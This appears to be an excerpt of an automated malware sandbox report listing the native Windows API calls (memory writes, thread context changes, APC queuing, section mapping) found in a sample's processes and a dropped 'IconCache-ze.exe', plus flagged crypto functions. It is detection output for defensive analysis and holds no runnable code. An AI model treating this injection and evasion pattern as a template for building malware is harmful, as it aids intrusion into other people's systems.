Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 2_2_003E4BDA NtAllocateVirtualMemory,2_2_003E4BDA
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 2_2_003E3A51 NtWriteVirtualMemory,2_2_003E3A51
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 2_2_003EA8E0 NtResumeThread,2_2_003EA8E0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 2_2_003E38CC NtWriteVirtualMemory,2_2_003E38CC
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 2_2_003EB2C5 NtResumeThread,2_2_003EB2C5
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 2_2_003E3738 NtWriteVirtualMemory,2_2_003E3738
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 2_2_003EA52A NtProtectVirtualMemory,2_2_003EA52A
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 2_2_003E0511 NtSetInformationThread,TerminateProcess,2_2_003E0511
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 2_2_003E35BC NtWriteVirtualMemory,2_2_003E35BC
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 2_2_003E3DA8 NtWriteVirtualMemory,2_2_003E3DA8
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 2_2_003E3BF4 NtWriteVirtualMemory,2_2_003E3BF4
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 4_2_0019A414 NtProtectVirtualMemory,4_2_0019A414
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 4_2_0019A8D2 NtResumeThread,4_2_0019A8D2
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 4_2_0019050D NtSetInformationThread,TerminateProcess,4_2_0019050D
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 4_2_00190504 NtSetInformationThread,4_2_00190504
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 4_2_00193586 NtWriteVirtualMemory,4_2_00193586
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 4_2_00194BDA NtAllocateVirtualMemory,4_2_00194BDA
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 4_2_00193A51 NtWriteVirtualMemory,4_2_00193A51
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 4_2_001938CC NtWriteVirtualMemory,4_2_001938CC
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 4_2_0019B2C5 NtResumeThread,4_2_0019B2C5
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 4_2_0019A8E0 NtResumeThread,4_2_0019A8E0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 4_2_00190511 NtSetInformationThread,TerminateProcess,4_2_00190511
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 4_2_00193738 NtWriteVirtualMemory,4_2_00193738
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 4_2_0019A52A NtProtectVirtualMemory,4_2_0019A52A
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 4_2_001935BC NtWriteVirtualMemory,4_2_001935BC
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 4_2_00193DA8 NtWriteVirtualMemory,4_2_00193DA8
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 4_2_00193BF4 NtWriteVirtualMemory,4_2_00193BF4
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA4EA0 NtAllocateVirtualMemory,NtAllocateVirtualMemory,5_2_1EBA4EA0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA5E80 NtReadFile,NtReadFile,5_2_1EBA5E80
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA5EC0 NtReadVirtualMemory,NtReadVirtualMemory,5_2_1EBA5EC0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA4E30 NtAdjustPrivilegesToken,NtAdjustPrivilegesToken,5_2_1EBA4E30
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA5E40 NtQueueApcThread,NtQueueApcThread,5_2_1EBA5E40
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA5C10 NtQueryInformationProcess,NtQueryInformationProcess,5_2_1EBA5C10
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA5DC0 NtQuerySystemInformation,NtQuerySystemInformation,5_2_1EBA5DC0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA57F0 NtMapViewOfSection,NtMapViewOfSection,5_2_1EBA57F0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA6460 NtSuspendThread,NtSuspendThread,5_2_1EBA6460
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA55A0 NtFreeVirtualMemory,5_2_1EBA55A0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA6580 NtUnmapViewOfSection,NtUnmapViewOfSection,5_2_1EBA6580
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA52B0 NtCreateSection,NtCreateSection,5_2_1EBA52B0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA5390 NtDelayExecution,NtDelayExecution,5_2_1EBA5390
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA6070 NtResumeThread,NtResumeThread,5_2_1EBA6070
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA5190 NtCreateFile,NtCreateFile,5_2_1EBA5190
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA6130 NtSetContextThread,NtSetContextThread,5_2_1EBA6130
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA5E20 NtQueryVirtualMemory,5_2_1EBA5E20
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA5E10 NtQueryValueKey,5_2_1EBA5E10
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA5C40 NtQueryInformationToken,5_2_1EBA5C40
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA5D50 NtQuerySection,5_2_1EBA5D50
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA5AE0 NtProtectVirtualMemory,5_2_1EBA5AE0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA5BE0 NtQueryInformationFile,5_2_1EBA5BE0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA5860 NtOpenDirectoryObject,5_2_1EBA5860
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA59D0 NtOpenThread,5_2_1EBA59D0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA5960 NtOpenProcessToken,5_2_1EBA5960
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA5950 NtOpenProcess,5_2_1EBA5950
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA6630 NtWriteFile,5_2_1EBA6630
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA6660 NtWriteVirtualMemory,5_2_1EBA6660
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA54B0 NtEnumerateKey,5_2_1EBA54B0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA54E0 NtEnumerateValueKey,5_2_1EBA54E0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA65E0 NtWaitForSingleObject,5_2_1EBA65E0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA55E0 NtGetContextThread,5_2_1EBA55E0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA5210 NtCreateMutant,5_2_1EBA5210
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA6200 NtSetInformationFile,5_2_1EBA6200
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA5270 NtCreateProcessEx,5_2_1EBA5270
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA63D0 NtSetValueKey,5_2_1EBA63D0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBA5090 NtClose,5_2_1EBA5090
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF65EC0 NtReadVirtualMemory,NtReadVirtualMemory,7_2_1EF65EC0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF65E80 NtReadFile,NtReadFile,7_2_1EF65E80
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF65E40 NtQueueApcThread,NtQueueApcThread,7_2_1EF65E40
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF65C10 NtQueryInformationProcess,NtQueryInformationProcess,7_2_1EF65C10
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF65DC0 NtQuerySystemInformation,NtQuerySystemInformation,7_2_1EF65DC0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF657F0 NtMapViewOfSection,NtMapViewOfSection,7_2_1EF657F0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF655A0 NtFreeVirtualMemory,7_2_1EF655A0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF652B0 NtCreateSection,NtCreateSection,7_2_1EF652B0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF65390 NtDelayExecution,NtDelayExecution,7_2_1EF65390
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF65190 NtCreateFile,NtCreateFile,7_2_1EF65190
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF64EA0 NtAllocateVirtualMemory,NtAllocateVirtualMemory,7_2_1EF64EA0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF64E30 NtAdjustPrivilegesToken,NtAdjustPrivilegesToken,7_2_1EF64E30
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF66460 NtSuspendThread,NtSuspendThread,7_2_1EF66460
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF66580 NtUnmapViewOfSection,NtUnmapViewOfSection,7_2_1EF66580
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF66070 NtResumeThread,NtResumeThread,7_2_1EF66070
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF66130 NtSetContextThread,NtSetContextThread,7_2_1EF66130
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF65E20 NtQueryVirtualMemory,7_2_1EF65E20
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF65E10 NtQueryValueKey,7_2_1EF65E10
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF65C40 NtQueryInformationToken,7_2_1EF65C40
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF65D50 NtQuerySection,7_2_1EF65D50
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF65AE0 NtProtectVirtualMemory,7_2_1EF65AE0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF65BE0 NtQueryInformationFile,7_2_1EF65BE0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF65860 NtOpenDirectoryObject,7_2_1EF65860
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF659D0 NtOpenThread,7_2_1EF659D0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF65960 NtOpenProcessToken,7_2_1EF65960
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF65950 NtOpenProcess,7_2_1EF65950
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF654E0 NtEnumerateValueKey,7_2_1EF654E0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF654B0 NtEnumerateKey,7_2_1EF654B0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF655E0 NtGetContextThread,7_2_1EF655E0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF65270 NtCreateProcessEx,7_2_1EF65270
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF65210 NtCreateMutant,7_2_1EF65210
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF65090 NtClose,7_2_1EF65090
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF651D0 NtCreateKey,7_2_1EF651D0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF66660 NtWriteVirtualMemory,7_2_1EF66660
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF66630 NtWriteFile,7_2_1EF66630
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF665E0 NtWaitForSingleObject,7_2_1EF665E0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF66200 NtSetInformationFile,7_2_1EF66200
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF663D0 NtSetValueKey,7_2_1EF663D0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_0015A414 NtProtectVirtualMemory,7_2_0015A414
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_00150504 NtSetInformationThread,NtProtectVirtualMemory,7_2_00150504
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_0015A8D2 NtSetInformationThread,7_2_0015A8D2
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_00154BDA NtAllocateVirtualMemory,7_2_00154BDA
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_00150511 NtSetInformationThread,7_2_00150511
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_0015050D NtSetInformationThread,7_2_0015050D
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_0015A52A NtProtectVirtualMemory,7_2_0015A52A
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_0015A8E0 NtSetInformationThread,7_2_0015A8E0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_00150DE0 NtProtectVirtualMemory,7_2_00150DE0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_00150EF0 NtProtectVirtualMemory,7_2_00150EF0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_0015B2C5 NtSetInformationThread,7_2_0015B2C5
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 14_2_0024A414 NtProtectVirtualMemory,14_2_0024A414
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 14_2_0024A8D2 NtResumeThread,14_2_0024A8D2
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 14_2_00240504 NtSetInformationThread,14_2_00240504
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 14_2_0024050D NtSetInformationThread,TerminateProcess,14_2_0024050D
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 14_2_00243586 NtWriteVirtualMemory,14_2_00243586
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 14_2_00244BDA NtAllocateVirtualMemory,14_2_00244BDA
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 14_2_00243A51 NtWriteVirtualMemory,14_2_00243A51
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 14_2_0024A8E0 NtResumeThread,14_2_0024A8E0
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 14_2_0024B2C5 NtResumeThread,14_2_0024B2C5
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 14_2_002438CC NtWriteVirtualMemory,14_2_002438CC
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 14_2_0024A52A NtProtectVirtualMemory,14_2_0024A52A
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 14_2_00243738 NtWriteVirtualMemory,14_2_00243738
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 14_2_00240511 NtSetInformationThread,TerminateProcess,14_2_00240511
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 14_2_00243DA8 NtWriteVirtualMemory,14_2_00243DA8
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 14_2_002435BC NtWriteVirtualMemory,14_2_002435BC
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 14_2_00243BF4 NtWriteVirtualMemory,14_2_00243BF4
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 15_2_0015A414 NtProtectVirtualMemory,15_2_0015A414
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 15_2_00150504 NtSetInformationThread,15_2_00150504
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 15_2_0015050D NtSetInformationThread,TerminateProcess,15_2_0015050D
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 15_2_00154BDA NtAllocateVirtualMemory,15_2_00154BDA
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 15_2_00150511 NtSetInformationThread,TerminateProcess,15_2_00150511
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 15_2_0015A52A NtProtectVirtualMemory,15_2_0015A52A
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED75EC0 NtReadVirtualMemory,NtReadVirtualMemory,17_2_1ED75EC0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED75E80 NtReadFile,NtReadFile,17_2_1ED75E80
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED75E40 NtQueueApcThread,NtQueueApcThread,17_2_1ED75E40
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED75C10 NtQueryInformationProcess,NtQueryInformationProcess,17_2_1ED75C10
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED75DC0 NtQuerySystemInformation,NtQuerySystemInformation,17_2_1ED75DC0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED757F0 NtMapViewOfSection,NtMapViewOfSection,17_2_1ED757F0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED755A0 NtFreeVirtualMemory,17_2_1ED755A0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED752B0 NtCreateSection,NtCreateSection,17_2_1ED752B0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED75390 NtDelayExecution,NtDelayExecution,17_2_1ED75390
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED75190 NtCreateFile,NtCreateFile,17_2_1ED75190
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED74EA0 NtAllocateVirtualMemory,NtAllocateVirtualMemory,17_2_1ED74EA0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED74E30 NtAdjustPrivilegesToken,NtAdjustPrivilegesToken,17_2_1ED74E30
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED76460 NtSuspendThread,NtSuspendThread,17_2_1ED76460
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED76580 NtUnmapViewOfSection,NtUnmapViewOfSection,17_2_1ED76580
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED76070 NtResumeThread,NtResumeThread,17_2_1ED76070
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED76130 NtSetContextThread,NtSetContextThread,17_2_1ED76130
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED75E10 NtQueryValueKey,17_2_1ED75E10
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED75E20 NtQueryVirtualMemory,17_2_1ED75E20
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED75C40 NtQueryInformationToken,17_2_1ED75C40
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED75D50 NtQuerySection,17_2_1ED75D50
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED75AE0 NtProtectVirtualMemory,17_2_1ED75AE0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED75BE0 NtQueryInformationFile,17_2_1ED75BE0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED75860 NtOpenDirectoryObject,17_2_1ED75860
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED759D0 NtOpenThread,17_2_1ED759D0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED75950 NtOpenProcess,17_2_1ED75950
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED75960 NtOpenProcessToken,17_2_1ED75960
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED754E0 NtEnumerateValueKey,17_2_1ED754E0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED754B0 NtEnumerateKey,17_2_1ED754B0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED755E0 NtGetContextThread,17_2_1ED755E0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED75270 NtCreateProcessEx,17_2_1ED75270
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED75210 NtCreateMutant,17_2_1ED75210
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED75090 NtClose,17_2_1ED75090
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED751D0 NtCreateKey,17_2_1ED751D0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED76660 NtWriteVirtualMemory,17_2_1ED76660
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED76630 NtWriteFile,17_2_1ED76630
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED765E0 NtWaitForSingleObject,17_2_1ED765E0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED76200 NtSetInformationFile,17_2_1ED76200
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED763D0 NtSetValueKey,17_2_1ED763D0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_0015A414 NtProtectVirtualMemory,17_2_0015A414
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_00150504 NtSetInformationThread,NtProtectVirtualMemory,17_2_00150504
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_0015A8D2 NtSetInformationThread,17_2_0015A8D2
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_00154BDA NtAllocateVirtualMemory,17_2_00154BDA
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_00150511 NtSetInformationThread,17_2_00150511
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_0015050D NtSetInformationThread,17_2_0015050D
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_0015A52A NtProtectVirtualMemory,17_2_0015A52A
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_0015A8E0 NtSetInformationThread,17_2_0015A8E0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_00150DE0 NtProtectVirtualMemory,17_2_00150DE0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_00150EF0 NtProtectVirtualMemory,17_2_00150EF0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_0015B2C5 NtSetInformationThread,17_2_0015B2C5
Detected potential crypto functionShow sources
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EB7EEC75_2_1EB7EEC7
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EB70E525_2_1EB70E52
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBB7FAB5_2_1EBB7FAB
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EB69F905_2_1EB69F90
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EB8DFD45_2_1EB8DFD4
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EB8DCFB5_2_1EB8DCFB
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBC5CCD5_2_1EBC5CCD
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EC25C565_2_1EC25C56
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBCFC465_2_1EBCFC46
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBB5DD85_2_1EBB5DD8
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EC0DD515_2_1EC0DD51
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBB2ADC5_2_1EBB2ADC
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBB9A685_2_1EBB9A68
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EB6CBA75_2_1EB6CBA7
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBCFBA65_2_1EBCFBA6
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EB80BFB5_2_1EB80BFB
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EC0DB955_2_1EC0DB95
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EC24BBA5_2_1EC24BBA
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EC278EA5_2_1EC278EA
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EB839845_2_1EB83984
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EC349905_2_1EC34990
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBB29EE5_2_1EBB29EE
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EC219075_2_1EC21907
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBB595C5_2_1EBB595C
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EBD39515_2_1EBD3951
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 5_2_1EB796B95_2_1EB796B9
